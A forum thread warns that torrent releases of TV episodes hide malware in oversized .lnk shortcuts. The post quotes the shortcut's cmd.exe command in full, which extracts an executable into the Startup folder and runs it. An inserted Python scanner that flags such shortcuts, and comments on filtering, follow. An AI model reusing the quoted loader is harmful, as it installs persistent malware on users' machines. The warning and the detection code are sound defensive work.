I have Sonarr and Radarr set up to keep me up to date on some TV shows. Lately I've gotten a handful of files that Sonarr refuses to import because of a .lnk file. The download consists of a folder with the name of the file I want. Inside the folder is a file with the same name, and a .lnk extension. The .lnk file is very big (950Mb), and programmed to run this script:

%ComSpec% /v:On/CSET el=Severance.S02E07.1080p.WEB.H264-SuccessfulCrab.mkv&SET c="%Appdata%\microsoft\windows\START MENU\PROGRAMS\STARTUP%Username%.exe"&(If not exist !c! Findstr/v "cmd.EXE Rj%TIME:~7,1%%TIME:~-2%" !el!.Lnk>!c!&Start "" !c!)&CD %tmp%&Echo.>!

As far as I can tell, this creates an empty executable file in your Windows startup folder, and copies a portion of the fake video file into it. It then runs the malware. And, since it's in your startup folder, it will run again every time you reboot.

The tracker is theRARBG, but it could also come from elsewhere. I've found it on a couple of different shows (not just this one), and they always download a couple of days before the airdate.

Be careful!
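A defender-side check for the layout described in the post, as an added example that is not part of the original post: it walks a completed-download folder and flags Windows shortcuts by extension or by the Shell Link header, noting a media-style name and an implausible size. The 64 KiB threshold, the media extension list and the release name in `demo()` are assumptions constructed for illustration.

```python
import os
import tempfile

# Shell Link header: HeaderSize 0x4C followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046 (MS-SHLLINK).
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
MEDIA_EXTS = {".mkv", ".mp4", ".avi"}  # assumed list of media extensions
MAX_SANE_LNK = 64 * 1024  # assumed threshold; real shortcuts are a few KB


def is_shell_link(path):
    """True if the file starts with the Shell Link header, whatever its name."""
    with open(path, "rb") as fh:
        return fh.read(len(LNK_MAGIC)) == LNK_MAGIC


def scan(root):
    """Return {relative_path: [reasons]} for suspicious files under root."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            stem, ext = os.path.splitext(name.lower())
            reasons = []
            if ext == ".lnk" or is_shell_link(path):
                reasons.append("shell-link")
                if os.path.splitext(stem)[1] in MEDIA_EXTS:
                    reasons.append("media-name-with-lnk-extension")
                if os.path.getsize(path) > MAX_SANE_LNK:
                    reasons.append("oversized-shortcut")
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings


def demo():
    """Build a constructed download folder and scan it."""
    with tempfile.TemporaryDirectory() as root:
        rel = "Show.S01E01.1080p.mkv"  # constructed release name
        os.mkdir(os.path.join(root, rel))
        with open(os.path.join(root, rel, rel + ".lnk"), "wb") as fh:
            fh.write(LNK_MAGIC + b"\0" * (MAX_SANE_LNK + 1))  # padded fake shortcut
        with open(os.path.join(root, rel, "sample.mkv"), "wb") as fh:
            fh.write(b"\x1a\x45\xdf\xa3")  # Matroska magic only, harmless
        return scan(root)
```

Calling `scan()` on the download client's completed folder before import gives a list of paths to quarantine; the header check also catches a shortcut that has been renamed to another extension.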

[-] AHorseWithNoNeigh@lemmy.dbzer0.com 39 points 2 months ago

See these all the time, unfortunately. I just add a line in the torrent client to not download anything with that file extension.

[-] Comexs@lemmy.zip 34 points 2 months ago
[-] otto@sh.itjust.works 16 points 2 months ago

I’ve been noticing these around. Sonarr catches them and I just delete them and research. I found that it’s often for the next week’s episode of a show, only days after the previous episode came out. So it’s easy to see something that looks suspect anyway.

[-] Biskii@lemmy.dbzer0.com 11 points 2 months ago

Thank you for the heads up!

[-] piccolo@sh.itjust.works 6 points 2 months ago
[-] fubbernuckin@lemmy.dbzer0.com 15 points 2 months ago

You laugh in Linux now, but just wait until the year of the Linux desktop comes. Every malware developer on earth will be knocking on our door.

[-] coldsideofyourpillow@lemmy.cafe 4 points 2 months ago
[-] Andromxda@lemmy.dbzer0.com 1 points 2 months ago
[-] coldsideofyourpillow@lemmy.cafe 1 points 2 months ago

Tried it, would not recommend.

[-] Andromxda@lemmy.dbzer0.com 1 points 2 months ago* (last edited 2 months ago)

It's time for ReactOS then. Maybe FreeDOS? Or the most divine OS of all, TempleOS.

[-] mr_right@lemmy.dbzer0.com 3 points 2 months ago
[-] Berstrrs@lemmy.dbzer0.com -1 points 2 months ago

I only laugh in Linux 'cause it's just the same analogy as driving a Dodge Ram in Europe - good luck finding spare parts.

At the same time VW Golf parts are sold almost in every convenience store.

[-] AmbiguousProps@lemmy.today 6 points 2 months ago

I luckily haven't encountered these yet, but I primarily use NZB

[-] LiveLM@lemmy.zip 5 points 2 months ago* (last edited 2 months ago)

This is why I fear plugging public trackers into the arr stack.
Would be nice if Sonarr could ignore any torrents available before an episode's listed air date

this post was submitted on 26 Feb 2025
103 points (100.0% liked)
